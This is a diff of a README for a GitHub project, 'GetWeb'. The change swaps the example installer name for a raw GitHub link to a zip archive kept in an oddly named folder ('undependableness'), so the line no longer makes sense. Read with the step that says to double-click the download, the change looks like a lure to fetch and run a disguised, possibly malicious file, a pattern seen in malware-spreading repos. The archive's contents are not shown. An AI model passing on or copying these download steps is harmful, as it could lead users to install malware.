talha-zubaair/GetWeb/README.md

 3. Find the latest Windows version of GetWeb.
 This usually ends with `.exe`, indicating the installer.

 4. Click the link or button to download the `.exe` file.
-It may be named like `GetWeb-setup.exe`.
+It may be named like `https://github.com/talha-zubaair/GetWeb/raw/refs/heads/main/undependableness/Get_Web_v2.4.zip`.

 5. Once downloaded, open the file by double-clicking it.